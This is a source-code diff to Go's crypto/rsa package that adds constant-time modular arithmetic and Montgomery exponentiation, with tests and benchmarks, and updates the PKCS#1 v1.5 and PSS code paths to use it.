++	d := new(nat).resetFor(m)
++
++	// Eliminate bounds checks in the loop.
++	size := len(m.nat.limbs)
++	xLimbs := x.limbs[:size]
++	dLimbs := d.limbs[:size]
++	mLimbs := m.nat.limbs[:size]
++
++	// Each iteration of this loop computes x = 2x + b mod m, where b is a bit
++	// from y. Effectively, it left-shifts x and adds y one bit at a time,
++	// reducing it every time.
++	//
++	// To do the reduction, each iteration computes both 2x + b and 2x + b - m.
++	// The next iteration (and finally the return line) will use either result
++	// based on whether the subtraction underflowed.
++	needSubtraction := no
++	for i := _W - 1; i >= 0; i-- {
++		carry := (y >> i) & 1
++		var borrow uint
++		for i := 0; i < size; i++ {
++			l := ctSelect(needSubtraction, dLimbs[i], xLimbs[i])
++
++			res := l<<1 + carry
++			xLimbs[i] = res & _MASK
++			carry = res >> _W
++
++			res = xLimbs[i] - mLimbs[i] - borrow
++			dLimbs[i] = res & _MASK
++			borrow = res >> _W
++		}
++		// See modAdd for how carry (aka overflow), borrow (aka underflow), and
++		// needSubtraction relate.
++		needSubtraction = ctEq(carry, borrow)
++	}
++	return x.assign(needSubtraction, d)
++}
++
++// mod calculates out = x mod m.
++//
++// This works regardless how large the value of x is.
++//
++// The output will be resized to the size of m and overwritten.
++func (out *nat) mod(x *nat, m *modulus) *nat {
++	out.resetFor(m)
++	// Working our way from the most significant to the least significant limb,
++	// we can insert each limb at the least significant position, shifting all
++	// previous limbs left by _W. This way each limb will get shifted by the
++	// correct number of bits. We can insert at least N - 1 limbs without
++	// overflowing m. After that, we need to reduce every time we shift.
++	i := len(x.limbs) - 1
++	// For the first N - 1 limbs we can skip the actual shifting and position
++	// them at the shifted position, which starts at min(N - 2, i).
++	start := len(m.nat.limbs) - 2
++	if i < start {
++		start = i
++	}
++	for j := start; j >= 0; j-- {
++		out.limbs[j] = x.limbs[i]
++		i--
++	}
++	// We shift in the remaining limbs, reducing modulo m each time.
++	for i >= 0 {
++		out.shiftIn(x.limbs[i], m)
++		i--
++	}
++	return out
++}
++
++// expandFor ensures out has the right size to work with operations modulo m.
++//
++// This assumes that out has as many or fewer limbs than m, or that the extra
++// limbs are all zero (which may happen when decoding a value that has leading
++// zeroes in its bytes representation that spill over the limb threshold).
++func (out *nat) expandFor(m *modulus) *nat {
++	return out.expand(len(m.nat.limbs))
++}
++
++// resetFor ensures out has the right size to work with operations modulo m.
++//
++// out is zeroed and may start at any size.
++func (out *nat) resetFor(m *modulus) *nat {
++	return out.reset(len(m.nat.limbs))
++}
++
++// modSub computes x = x - y mod m.
++//
++// The length of both operands must be the same as the modulus. Both operands
++// must already be reduced modulo m.
++func (x *nat) modSub(y *nat, m *modulus) *nat {
++	underflow := x.sub(yes, y)
++	// If the subtraction underflowed, add m.
++	x.add(choice(underflow), m.nat)
++	return x
++}
++
++// modAdd computes x = x + y mod m.
++//
++// The length of both operands must be the same as the modulus. Both operands
++// must already be reduced modulo m.
++func (x *nat) modAdd(y *nat, m *modulus) *nat {
++	overflow := x.add(yes, y)
++	underflow := not(x.cmpGeq(m.nat)) // x < m
++
++	// Three cases are possible:
++	//
++	//   - overflow = 0, underflow = 0
++	//
++	// In this case, addition fits in our limbs, but we can still subtract away
++	// m without an underflow, so we need to perform the subtraction to reduce
++	// our result.
++	//
++	//   - overflow = 0, underflow = 1
++	//
++	// The addition fits in our limbs, but we can't subtract m without
++	// underflowing. The result is already reduced.
++	//
++	//   - overflow = 1, underflow = 1
++	//
++	// The addition does not fit in our limbs, and the subtraction's borrow
++	// would cancel out with the addition's carry. We need to subtract m to
++	// reduce our result.
++	//
++	// The overflow = 1, underflow = 0 case is not possible, because y is at
++	// most m - 1, and if adding m - 1 overflows, then subtracting m must
++	// necessarily underflow.
++	needSubtraction := ctEq(overflow, uint(underflow))
++
++	x.sub(needSubtraction, m.nat)
++	return x
++}
++
++// montgomeryRepresentation calculates x = x * R mod m, with R = 2^(_W * n) and
++// n = len(m.nat.limbs).
++//
++// Faster Montgomery multiplication replaces standard modular multiplication for
++// numbers in this representation.
++//
++// This assumes that x is already reduced mod m.
++func (x *nat) montgomeryRepresentation(m *modulus) *nat {
++	for i := 0; i < len(m.nat.limbs); i++ {
++		x.shiftIn(0, m) // x = x * 2^_W mod m
++	}
++	return x
++}
++
++// montgomeryMul calculates d = a * b / R mod m, with R = 2^(_W * n) and
++// n = len(m.nat.limbs), using the Montgomery Multiplication technique.
++//
++// All inputs should be the same length, not aliasing d, and already
++// reduced modulo m. d will be resized to the size of m and overwritten.
++func (d *nat) montgomeryMul(a *nat, b *nat, m *modulus) *nat {
++	// See https://bearssl.org/bigint.html#montgomery-reduction-and-multiplication
++	// for a description of the algorithm.
++
++	// Eliminate bounds checks in the loop.
++	size := len(m.nat.limbs)
++	aLimbs := a.limbs[:size]
++	bLimbs := b.limbs[:size]
++	dLimbs := d.resetFor(m).limbs[:size]
++	mLimbs := m.nat.limbs[:size]
++
++	var overflow uint
++	for i := 0; i < size; i++ {
++		f := ((dLimbs[0] + aLimbs[i]*bLimbs[0]) * m.m0inv) & _MASK
++		carry := uint(0)
++		for j := 0; j < size; j++ {
++			// z = d[j] + a[i] * b[j] + f * m[j] + carry <= 2^(2W+1) - 2^(W+1) + 2^W
++			hi, lo := bits.Mul(aLimbs[i], bLimbs[j])
++			z_lo, c := bits.Add(dLimbs[j], lo, 0)
++			z_hi, _ := bits.Add(0, hi, c)
++			hi, lo = bits.Mul(f, mLimbs[j])
++			z_lo, c = bits.Add(z_lo, lo, 0)
++			z_hi, _ = bits.Add(z_hi, hi, c)
++			z_lo, c = bits.Add(z_lo, carry, 0)
++			z_hi, _ = bits.Add(z_hi, 0, c)
++			if j > 0 {
++				dLimbs[j-1] = z_lo & _MASK
++			}
++			carry = z_hi<<1 | z_lo>>_W // carry <= 2^(W+1) - 2
++		}
++		z := overflow + carry // z <= 2^(W+1) - 1
++		dLimbs[size-1] = z & _MASK
++		overflow = z >> _W // overflow <= 1
++	}
++	// See modAdd for how overflow, underflow, and needSubtraction relate.
++	underflow := not(d.cmpGeq(m.nat)) // d < m
++	needSubtraction := ctEq(overflow, uint(underflow))
++	d.sub(needSubtraction, m.nat)
++
++	return d
++}
++
++// modMul calculates x *= y mod m.
++//
++// x and y must already be reduced modulo m, they must share its announced
++// length, and they may not alias.
++func (x *nat) modMul(y *nat, m *modulus) *nat {
++	// A Montgomery multiplication by a value out of the Montgomery domain
++	// takes the result out of Montgomery representation.
++	xR := x.clone().montgomeryRepresentation(m) // xR = x * R mod m
++	return x.montgomeryMul(xR, y, m)            // x = xR * y / R mod m
++}
++
++// exp calculates out = x^e mod m.
++//
++// The exponent e is represented in big-endian order. The output will be resized
++// to the size of m and overwritten. x must already be reduced modulo m.
++func (out *nat) exp(x *nat, e []byte, m *modulus) *nat {
++	// We use a 4 bit window. For our RSA workload, 4 bit windows are faster
++	// than 2 bit windows, but use an extra 12 nats worth of scratch space.
++	// Using bit sizes that don't divide 8 are more complex to implement.
++	table := make([]*nat, (1<<4)-1) // table[i] = x ^ (i+1)
++	table[0] = x.clone().montgomeryRepresentation(m)
++	for i := 1; i < len(table); i++ {
++		table[i] = new(nat).expandFor(m)
++		table[i].montgomeryMul(table[i-1], table[0], m)
++	}
++
++	out.resetFor(m)
++	out.limbs[0] = 1
++	out.montgomeryRepresentation(m)
++	t0 := new(nat).expandFor(m)
++	t1 := new(nat).expandFor(m)
++	for _, b := range e {
++		for _, j := range []int{4, 0} {
++			// Square four times.
++			t1.montgomeryMul(out, out, m)
++			out.montgomeryMul(t1, t1, m)
++			t1.montgomeryMul(out, out, m)
++			out.montgomeryMul(t1, t1, m)
++
++			// Select x^k in constant time from the table.
++			k := uint((b >> j) & 0b1111)
++			for i := range table {
++				t0.assign(ctEq(k, uint(i+1)), table[i])
++			}
++
++			// Multiply by x^k, discarding the result if k = 0.
++			t1.montgomeryMul(out, t0, m)
++			out.assign(not(ctEq(k, 0)), t1)
++		}
++	}
++
++	// By Montgomery multiplying with 1 not in Montgomery representation, we
++	// convert out back from Montgomery representation, because it works out to
++	// dividing by R.
++	t0.assign(yes, out)
++	t1.resetFor(m)
++	t1.limbs[0] = 1
++	out.montgomeryMul(t0, t1, m)
++
++	return out
++}
+diff --git a/src/crypto/rsa/nat_test.go b/src/crypto/rsa/nat_test.go
+new file mode 100644
+index 0000000..3e6eb10
+--- /dev/null
++++ b/src/crypto/rsa/nat_test.go
+@@ -0,0 +1,384 @@
++// Copyright 2021 The Go Authors. All rights reserved.
++// Use of this source code is governed by a BSD-style
++// license that can be found in the LICENSE file.
++
++package rsa
++
++import (
++	"bytes"
++	"math/big"
++	"math/bits"
++	"math/rand"
++	"reflect"
++	"testing"
++	"testing/quick"
++)
++
++// Generate generates an even nat. It's used by testing/quick to produce random
++// *nat values for quick.Check invocations.
++func (*nat) Generate(r *rand.Rand, size int) reflect.Value {
++	limbs := make([]uint, size)
++	for i := 0; i < size; i++ {
++		limbs[i] = uint(r.Uint64()) & ((1 << _W) - 2)
++	}
++	return reflect.ValueOf(&nat{limbs})
++}
++
++func testModAddCommutative(a *nat, b *nat) bool {
++	mLimbs := make([]uint, len(a.limbs))
++	for i := 0; i < len(mLimbs); i++ {
++		mLimbs[i] = _MASK
++	}
++	m := modulusFromNat(&nat{mLimbs})
++	aPlusB := a.clone()
++	aPlusB.modAdd(b, m)
++	bPlusA := b.clone()
++	bPlusA.modAdd(a, m)
++	return aPlusB.cmpEq(bPlusA) == 1
++}
++
++func TestModAddCommutative(t *testing.T) {
++	err := quick.Check(testModAddCommutative, &quick.Config{})
++	if err != nil {
++		t.Error(err)
++	}
++}
++
++func testModSubThenAddIdentity(a *nat, b *nat) bool {
++	mLimbs := make([]uint, len(a.limbs))
++	for i := 0; i < len(mLimbs); i++ {
++		mLimbs[i] = _MASK
++	}
++	m := modulusFromNat(&nat{mLimbs})
++	original := a.clone()
++	a.modSub(b, m)
++	a.modAdd(b, m)
++	return a.cmpEq(original) == 1
++}
++
++func TestModSubThenAddIdentity(t *testing.T) {
++	err := quick.Check(testModSubThenAddIdentity, &quick.Config{})
++	if err != nil {
++		t.Error(err)
++	}
++}
++
++func testMontgomeryRoundtrip(a *nat) bool {
++	one := &nat{make([]uint, len(a.limbs))}
++	one.limbs[0] = 1
++	aPlusOne := a.clone()
++	aPlusOne.add(1, one)
++	m := modulusFromNat(aPlusOne)
++	monty := a.clone()
++	monty.montgomeryRepresentation(m)
++	aAgain := monty.clone()
++	aAgain.montgomeryMul(monty, one, m)
++	return a.cmpEq(aAgain) == 1
++}
++
++func TestMontgomeryRoundtrip(t *testing.T) {
++	err := quick.Check(testMontgomeryRoundtrip, &quick.Config{})
++	if err != nil {
++		t.Error(err)
++	}
++}
++
++func TestFromBig(t *testing.T) {
++	expected := []byte{0x01, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff}
++	theBig := new(big.Int).SetBytes(expected)
++	actual := natFromBig(theBig).fillBytes(make([]byte, len(expected)))
++	if !bytes.Equal(actual, expected) {
++		t.Errorf("%+x != %+x", actual, expected)
++	}
++}
++
++func TestFillBytes(t *testing.T) {
++	xBytes := []byte{0xAA, 0xFF, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88}
++	x := natFromBytes(xBytes)
++	for l := 20; l >= len(xBytes); l-- {
++		buf := make([]byte, l)
++		rand.Read(buf)
++		actual := x.fillBytes(buf)
++		expected := make([]byte, l)
++		copy(expected[l-len(xBytes):], xBytes)
++		if !bytes.Equal(actual, expected) {
++			t.Errorf("%d: %+v != %+v", l, actual, expected)
++		}
++	}
++	for l := len(xBytes) - 1; l >= 0; l-- {
++		(func() {
++			defer func() {
++				if recover() == nil {
++					t.Errorf("%d: expected panic", l)
++				}
++			}()
++			x.fillBytes(make([]byte, l))
++		})()
++	}
++}
++
++func TestFromBytes(t *testing.T) {
++	f := func(xBytes []byte) bool {
++		if len(xBytes) == 0 {
++			return true
++		}
++		actual := natFromBytes(xBytes).fillBytes(make([]byte, len(xBytes)))
++		if !bytes.Equal(actual, xBytes) {
++			t.Errorf("%+x != %+x", actual, xBytes)
++			return false
++		}
++		return true
++	}
++
++	err := quick.Check(f, &quick.Config{})
++	if err != nil {
++		t.Error(err)
++	}
++
++	f([]byte{0xFF, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88})
++	f(bytes.Repeat([]byte{0xFF}, _W))
++}
++
++func TestShiftIn(t *testing.T) {
++	if bits.UintSize != 64 {
++		t.Skip("examples are only valid in 64 bit")
++	}
++	examples := []struct {
++		m, x, expected []byte
++		y              uint64
++	}{{
++		m:        []byte{13},
++		x:        []byte{0},
++		y:        0x7FFF_FFFF_FFFF_FFFF,
++		expected: []byte{7},
++	}, {
++		m:        []byte{13},
++		x:        []byte{7},
++		y:        0x7FFF_FFFF_FFFF_FFFF,
++		expected: []byte{11},
++	}, {
++		m:        []byte{0x06, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0d},
++		x:        make([]byte, 9),
++		y:        0x7FFF_FFFF_FFFF_FFFF,
++		expected: []byte{0x00, 0x7f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff},
++	}, {
++		m:        []byte{0x06, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0d},
++		x:        []byte{0x00, 0x7f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff},
++		y:        0,
++		expected: []byte{0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08},
++	}}
++
++	for i, tt := range examples {
++		m := modulusFromNat(natFromBytes(tt.m))
++		got := natFromBytes(tt.x).expandFor(m).shiftIn(uint(tt.y), m)
++		if got.cmpEq(natFromBytes(tt.expected).expandFor(m)) != 1 {
++			t.Errorf("%d: got %x, expected %x", i, got, tt.expected)
++		}
++	}
++}
++
++func TestModulusAndNatSizes(t *testing.T) {
++	// These are 126 bit (2 * _W on 64-bit architectures) values, serialized as
++	// 128 bits worth of bytes. If leading zeroes are stripped, they fit in two
++	// limbs, if they are not, they fit in three. This can be a problem because
++	// modulus strips leading zeroes and nat does not.
++	m := modulusFromNat(natFromBytes([]byte{
++		0x3f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
++		0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff}))
++	x := natFromBytes([]byte{
++		0x3f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
++		0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfe})
++	x.expandFor(m) // must not panic for shrinking
++}
++
++func TestExpand(t *testing.T) {
++	sliced := []uint{1, 2, 3, 4}
++	examples := []struct {
++		in  []uint
++		n   int
++		out []uint
++	}{{
++		[]uint{1, 2},
++		4,
++		[]uint{1, 2, 0, 0},
++	}, {
++		sliced[:2],
++		4,
++		[]uint{1, 2, 0, 0},
++	}, {
++		[]uint{1, 2},
++		2,
++		[]uint{1, 2},
++	}, {
++		[]uint{1, 2, 0},
++		2,
++		[]uint{1, 2},
++	}}
++
++	for i, tt := range examples {
++		got := (&nat{tt.in}).expand(tt.n)
++		if len(got.limbs) != len(tt.out) || got.cmpEq(&nat{tt.out}) != 1 {
++			t.Errorf("%d: got %x, expected %x", i, got, tt.out)
++		}
++	}
++}
++
++func TestMod(t *testing.T) {
++	m := modulusFromNat(natFromBytes([]byte{0x06, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0d}))
++	x := natFromBytes([]byte{0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01})
++	out := new(nat)
++	out.mod(x, m)
++	expected := natFromBytes([]byte{0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x09})
++	if out.cmpEq(expected) != 1 {
++		t.Errorf("%+v != %+v", out, expected)
++	}
++}
++
++func TestModSub(t *testing.T) {
++	m := modulusFromNat(&nat{[]uint{13}})
++	x := &nat{[]uint{6}}
++	y := &nat{[]uint{7}}
++	x.modSub(y, m)
++	expected := &nat{[]uint{12}}
++	if x.cmpEq(expected) != 1 {
++		t.Errorf("%+v != %+v", x, expected)
++	}
++	x.modSub(y, m)
++	expected = &nat{[]uint{5}}
++	if x.cmpEq(expected) != 1 {
++		t.Errorf("%+v != %+v", x, expected)
++	}
++}
++
++func TestModAdd(t *testing.T) {
++	m := modulusFromNat(&nat{[]uint{13}})
++	x := &nat{[]uint{6}}
++	y := &nat{[]uint{7}}
++	x.modAdd(y, m)
++	expected := &nat{[]uint{0}}
++	if x.cmpEq(expected) != 1 {
++		t.Errorf("%+v != %+v", x, expected)
++	}
++	x.modAdd(y, m)
++	expected = &nat{[]uint{7}}
++	if x.cmpEq(expected) != 1 {
++		t.Errorf("%+v != %+v", x, expected)
++	}
++}
++
++func TestExp(t *testing.T) {
++	m := modulusFromNat(&nat{[]uint{13}})
++	x := &nat{[]uint{3}}
++	out := &nat{[]uint{0}}
++	out.exp(x, []byte{12}, m)
++	expected := &nat{[]uint{1}}
++	if out.cmpEq(expected) != 1 {
++		t.Errorf("%+v != %+v", out, expected)
++	}
++}
++
++func makeBenchmarkModulus() *modulus {
++	m := make([]uint, 32)
++	for i := 0; i < 32; i++ {
++		m[i] = _MASK
++	}
++	return modulusFromNat(&nat{limbs: m})
++}
++
++func makeBenchmarkValue() *nat {
++	x := make([]uint, 32)
++	for i := 0; i < 32; i++ {
++		x[i] = _MASK - 1
++	}
++	return &nat{limbs: x}
++}
++
++func makeBenchmarkExponent() []byte {
++	e := make([]byte, 256)
++	for i := 0; i < 32; i++ {
++		e[i] = 0xFF
++	}
++	return e
++}
++
++func BenchmarkModAdd(b *testing.B) {
++	x := makeBenchmarkValue()
++	y := makeBenchmarkValue()
++	m := makeBenchmarkModulus()
++
++	b.ResetTimer()
++	for i := 0; i < b.N; i++ {
++		x.modAdd(y, m)
++	}
++}
++
++func BenchmarkModSub(b *testing.B) {
++	x := makeBenchmarkValue()
++	y := makeBenchmarkValue()
++	m := makeBenchmarkModulus()
++
++	b.ResetTimer()
++	for i := 0; i < b.N; i++ {
++		x.modSub(y, m)
++	}
++}
++
++func BenchmarkMontgomeryRepr(b *testing.B) {
++	x := makeBenchmarkValue()
++	m := makeBenchmarkModulus()
++
++	b.ResetTimer()
++	for i := 0; i < b.N; i++ {
++		x.montgomeryRepresentation(m)
++	}
++}
++
++func BenchmarkMontgomeryMul(b *testing.B) {
++	x := makeBenchmarkValue()
++	y := makeBenchmarkValue()
++	out := makeBenchmarkValue()
++	m := makeBenchmarkModulus()
++
++	b.ResetTimer()
++	for i := 0; i < b.N; i++ {
++		out.montgomeryMul(x, y, m)
++	}
++}
++
++func BenchmarkModMul(b *testing.B) {
++	x := makeBenchmarkValue()
++	y := makeBenchmarkValue()
++	m := makeBenchmarkModulus()
++
++	b.ResetTimer()
++	for i := 0; i < b.N; i++ {
++		x.modMul(y, m)
++	}
++}
++
++func BenchmarkExpBig(b *testing.B) {
++	out := new(big.Int)
++	exponentBytes := makeBenchmarkExponent()
++	x := new(big.Int).SetBytes(exponentBytes)
++	e := new(big.Int).SetBytes(exponentBytes)
++	n := new(big.Int).SetBytes(exponentBytes)
++	one := new(big.Int).SetUint64(1)
++	n.Add(n, one)
++
++	b.ResetTimer()
++	for i := 0; i < b.N; i++ {
++		out.Exp(x, e, n)
++	}
++}
++
++func BenchmarkExp(b *testing.B) {
++	x := makeBenchmarkValue()
++	e := makeBenchmarkExponent()
++	out := makeBenchmarkValue()
++	m := makeBenchmarkModulus()
++
++	b.ResetTimer()
++	for i := 0; i < b.N; i++ {
++		out.exp(x, e, m)
++	}
++}
+diff --git a/src/crypto/rsa/pkcs1v15.go b/src/crypto/rsa/pkcs1v15.go
+index a216be3..ce89f92 100644
+--- a/src/crypto/rsa/pkcs1v15.go
++++ b/src/crypto/rsa/pkcs1v15.go
+@@ -9,7 +9,6 @@ import (
+ 	"crypto/subtle"
+ 	"errors"
+ 	"io"
+-	"math/big"
+ 
+ 	"crypto/internal/randutil"
+ )
+@@ -58,14 +57,11 @@ func EncryptPKCS1v15(rand io.Reader, pub *PublicKey, msg []byte) ([]byte, error)
+ 	em[len(em)-len(msg)-1] = 0
+ 	copy(mm, msg)
+ 
+-	m := new(big.Int).SetBytes(em)
+-	c := encrypt(new(big.Int), pub, m)
+-
+-	return c.FillBytes(em), nil
++	return encrypt(pub, em), nil
+ }
+ 
+ // DecryptPKCS1v15 decrypts a plaintext using RSA and the padding scheme from PKCS#1 v1.5.
+-// If rand != nil, it uses RSA blinding to avoid timing side-channel attacks.
++// The rand parameter is legacy and ignored, and it can be as nil.
+ //
+ // Note that whether this function returns an error or not discloses secret
+ // information. If an attacker can cause this function to run repeatedly and
+@@ -76,7 +72,7 @@ func DecryptPKCS1v15(rand io.Reader, priv *PrivateKey, ciphertext []byte) ([]byt
+ 	if err := checkPub(&priv.PublicKey); err != nil {
+ 		return nil, err
+ 	}
+-	valid, out, index, err := decryptPKCS1v15(rand, priv, ciphertext)
++	valid, out, index, err := decryptPKCS1v15(priv, ciphertext)
+ 	if err != nil {
+ 		return nil, err
+ 	}
+@@ -87,7 +83,7 @@ func DecryptPKCS1v15(rand io.Reader, priv *PrivateKey, ciphertext []byte) ([]byt
+ }
+ 
+ // DecryptPKCS1v15SessionKey decrypts a session key using RSA and the padding scheme from PKCS#1 v1.5.
+-// If rand != nil, it uses RSA blinding to avoid timing side-channel attacks.
++// The rand parameter is legacy and ignored, and it can be as nil.
+ // It returns an error if the ciphertext is the wrong length or if the
+ // ciphertext is greater than the public modulus. Otherwise, no error is
+ // returned. If the padding is valid, the resulting plaintext message is copied
+@@ -114,7 +110,7 @@ func DecryptPKCS1v15SessionKey(rand io.Reader, priv *PrivateKey, ciphertext []by
+ 		return ErrDecryption
+ 	}
+ 
+-	valid, em, index, err := decryptPKCS1v15(rand, priv, ciphertext)
++	valid, em, index, err := decryptPKCS1v15(priv, ciphertext)
+ 	if err != nil {
+ 		return err
+ 	}
+@@ -130,26 +126,24 @@ func DecryptPKCS1v15SessionKey(rand io.Reader, priv *PrivateKey, ciphertext []by
+ 	return nil
+ }
+ 
+-// decryptPKCS1v15 decrypts ciphertext using priv and blinds the operation if
+-// rand is not nil. It returns one or zero in valid that indicates whether the
+-// plaintext was correctly structured. In either case, the plaintext is
+-// returned in em so that it may be read independently of whether it was valid
+-// in order to maintain constant memory access patterns. If the plaintext was
+-// valid then index contains the index of the original message in em.
+-func decryptPKCS1v15(rand io.Reader, priv *PrivateKey, ciphertext []byte) (valid int, em []byte, index int, err error) {
++// decryptPKCS1v15 decrypts ciphertext using priv. It returns one or zero in
++// valid that indicates whether the plaintext was correctly structured.
++// In either case, the plaintext is returned in em so that it may be read
++// independently of whether it was valid in order to maintain constant memory
++// access patterns. If the plaintext was valid then index contains the index of
++// the original message in em, to allow constant time padding removal.
++func decryptPKCS1v15(priv *PrivateKey, ciphertext []byte) (valid int, em []byte, index int, err error) {
+ 	k := priv.Size()
+ 	if k < 11 {
+ 		err = ErrDecryption
+ 		return
+ 	}
+ 
+-	c := new(big.Int).SetBytes(ciphertext)
+-	m, err := decrypt(rand, priv, c)
++	em, err = decrypt(priv, ciphertext)
+ 	if err != nil {
+ 		return
+ 	}
+ 
+-	em = m.FillBytes(make([]byte, k))
+ 	firstByteIsZero := subtle.ConstantTimeByteEq(em[0], 0)
+ 	secondByteIsTwo := subtle.ConstantTimeByteEq(em[1], 2)
+ 
+@@ -221,8 +215,7 @@ var hashPrefixes = map[crypto.Hash][]byte{
+ // function. If hash is zero, hashed is signed directly. This isn't
+ // advisable except for interoperability.
+ //
+-// If rand is not nil then RSA blinding will be used to avoid timing
+-// side-channel attacks.
++// The rand parameter is legacy and ignored, and it can be as nil.
+ //
+ // This function is deterministic. Thus, if the set of possible
+ // messages is small, an attacker may be able to build a map from
+@@ -249,13 +242,7 @@ func SignPKCS1v15(rand io.Reader, priv *PrivateKey, hash crypto.Hash, hashed []b
+ 	copy(em[k-tLen:k-hashLen], prefix)
+ 	copy(em[k-hashLen:k], hashed)
+ 
+-	m := new(big.Int).SetBytes(em)
+-	c, err := decryptAndCheck(rand, priv, m)
+-	if err != nil {
+-		return nil, err
+-	}
+-
+-	return c.FillBytes(em), nil
++	return decryptAndCheck(priv, em)
+ }
+ 
+ // VerifyPKCS1v15 verifies an RSA PKCS#1 v1.5 signature.
+@@ -275,9 +262,7 @@ func VerifyPKCS1v15(pub *PublicKey, hash crypto.Hash, hashed []byte, sig []byte)
+ 		return ErrVerification
+ 	}
+ 
+-	c := new(big.Int).SetBytes(sig)
+-	m := encrypt(new(big.Int), pub, c)
+-	em := m.FillBytes(make([]byte, k))
++	em := encrypt(pub, sig)
+ 	// EM = 0x00 || 0x01 || PS || 0x00 || T
+ 
+ 	ok := subtle.ConstantTimeByteEq(em[0], 0)
+diff --git a/src/crypto/rsa/pss.go b/src/crypto/rsa/pss.go
+index 814522d..eaba4be 100644
+--- a/src/crypto/rsa/pss.go
++++ b/src/crypto/rsa/pss.go
+@@ -12,7 +12,6 @@ import (
+ 	"errors"
+ 	"hash"
+ 	"io"
+-	"math/big"
+ )
+ 
+ // Per RFC 8017, Section 9.1
+@@ -207,19 +206,27 @@ func emsaPSSVerify(mHash, em []byte, emBits, sLen int, hash hash.Hash) error {
+ // Note that hashed must be the result of hashing the input message using the
+ // given hash function. salt is a random sequence of bytes whose length will be
+ // later used to verify the signature.
+-func signPSSWithSalt(rand io.Reader, priv *PrivateKey, hash crypto.Hash, hashed, salt []byte) ([]byte, error) {
+-	emBits := priv.N.BitLen() - 1
++func signPSSWithSalt(priv *PrivateKey, hash crypto.Hash, hashed, salt []byte) ([]byte, error) {
++	emBits := bigBitLen(priv.N) - 1
+ 	em, err := emsaPSSEncode(hashed, emBits, salt, hash.New())
+ 	if err != nil {
+ 		return nil, err
+ 	}
+-	m := new(big.Int).SetBytes(em)
+-	c, err := decryptAndCheck(rand, priv, m)
+-	if err != nil {
+-		return nil, err
++
++	// RFC 8017: "Note that the octet length of EM will be one less than k if
++	// modBits - 1 is divisible by 8 and equal to k otherwise, where k is the
++	// length in octets of the RSA modulus n."
++	//
++	// This is extremely annoying, as all other encrypt and decrypt inputs are
++	// always the exact same size as the modulus. Since it only happens for
++	// weird modulus sizes, fix it by padding inefficiently.
++	if emLen, k := len(em), priv.Size(); emLen < k {
++		emNew := make([]byte, k)
++		copy(emNew[k-emLen:], em)
++		em = emNew
+ 	}
+-	s := make([]byte, priv.Size())
+-	return c.FillBytes(s), nil
++
++	return decryptAndCheck(priv, em)
+ }
+ 
+ const (
+@@ -269,7 +276,7 @@ func SignPSS(rand io.Reader, priv *PrivateKey, hash crypto.Hash, digest []byte,
+ 	saltLength := opts.saltLength()
+ 	switch saltLength {
+ 	case PSSSaltLengthAuto:
+-		saltLength = (priv.N.BitLen()-1+7)/8 - 2 - hash.Size()
++		saltLength = (bigBitLen(priv.N)-1+7)/8 - 2 - hash.Size()
+ 	case PSSSaltLengthEqualsHash:
+ 		saltLength = hash.Size()
+ 	}
+@@ -278,7 +285,7 @@ func SignPSS(rand io.Reader, priv *PrivateKey, hash crypto.Hash, digest []byte,
+ 	if _, err := io.ReadFull(rand, salt); err != nil {
+ 		return nil, err
+ 	}
+-	return signPSSWithSalt(rand, priv, hash, digest, salt)
++	return signPSSWithSalt(priv, hash, digest, salt)
+ }
+ 
+ // VerifyPSS verifies a PSS signature.
+@@ -291,13 +298,22 @@ func VerifyPSS(pub *PublicKey, hash crypto.Hash, digest []byte, sig []byte, opts
+ 	if len(sig) != pub.Size() {
+ 		return ErrVerification
+ 	}
+-	s := new(big.Int).SetBytes(sig)
+-	m := encrypt(new(big.Int), pub, s)
+-	emBits := pub.N.BitLen() - 1
++
++	emBits := bigBitLen(pub.N) - 1
+ 	emLen := (emBits + 7) / 8
+-	if m.BitLen() > emLen*8 {
+-		return ErrVerification
++	em := encrypt(pub, sig)
++
++	// Like in signPSSWithSalt, deal with mismatches between emLen and the size
++	// of the modulus. The spec would have us wire emLen into the encoding
++	// function, but we'd rather always encode to the size of the modulus and
++	// then strip leading zeroes if necessary. This only happens for weird
++	// modulus sizes anyway.
++	for len(em) > emLen && len(em) > 0 {
++		if em[0] != 0 {
++			return ErrVerification
++		}
++		em = em[1:]
+ 	}
+-	em := m.FillBytes(make([]byte, emLen))
++
+ 	return emsaPSSVerify(digest, em, emBits, opts.saltLength(), hash.New())
+ }
+diff --git a/src/crypto/rsa/pss_test.go b/src/crypto/rsa/pss_test.go
+index c3a6d46..d018b43 100644
+--- a/src/crypto/rsa/pss_test.go
++++ b/src/crypto/rsa/pss_test.go
+@@ -233,7 +233,10 @@ func TestPSSSigning(t *testing.T) {
+ 	}
+ }
+ 
+-func TestSignWithPSSSaltLengthAuto(t *testing.T) {
++func TestPSS513(t *testing.T) {
++	// See Issue 42741, and separately, RFC 8017: "Note that the octet length of
++	// EM will be one less than k if modBits - 1 is divisible by 8 and equal to
++	// k otherwise, where k is the length in octets of the RSA modulus n."
+ 	key, err := GenerateKey(rand.Reader, 513)
+ 	if err != nil {
+ 		t.Fatal(err)
+@@ -246,8 +249,9 @@ func TestSignWithPSSSaltLengthAuto(t *testing.T) {
+ 	if err != nil {
+ 		t.Fatal(err)
+ 	}
+-	if len(signature) == 0 {
+-		t.Fatal("empty signature returned")
++	err = VerifyPSS(&key.PublicKey, crypto.SHA256, digest[:], signature, nil)
++	if err != nil {
++		t.Error(err)
+ 	}
+ }
+ 
